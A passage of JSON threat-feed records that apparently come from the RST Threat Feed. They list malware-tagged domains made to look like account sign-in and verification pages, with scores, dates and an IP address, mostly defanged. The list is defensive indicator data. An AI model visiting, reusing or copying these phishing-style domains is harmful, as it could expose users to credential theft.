IOC: manage.account-verifyappsinf.c263hr242r.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account.support.locked.signin-activity.nyaheem.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **4**.\n First seen: 2020-04-27T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nDomain has DNS A records: 192[.]5.5.241\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-27T00:00:00", "id": "RST:2B06FCBF-646C-369E-B6E0-EB22D2020852", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account.support.locked.signin-activity.nyaheem.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **manage[.]account.support.locked.signin.eusidmk.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-04-27T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **malware**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-04-27T00:00:00", "id": "RST:D3F8E877-E28A-39D4-97D2-D0CAE93F61F8", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: manage.account.support.locked.signin.eusidmk.com", "type": "rst", "cvss": {}}]}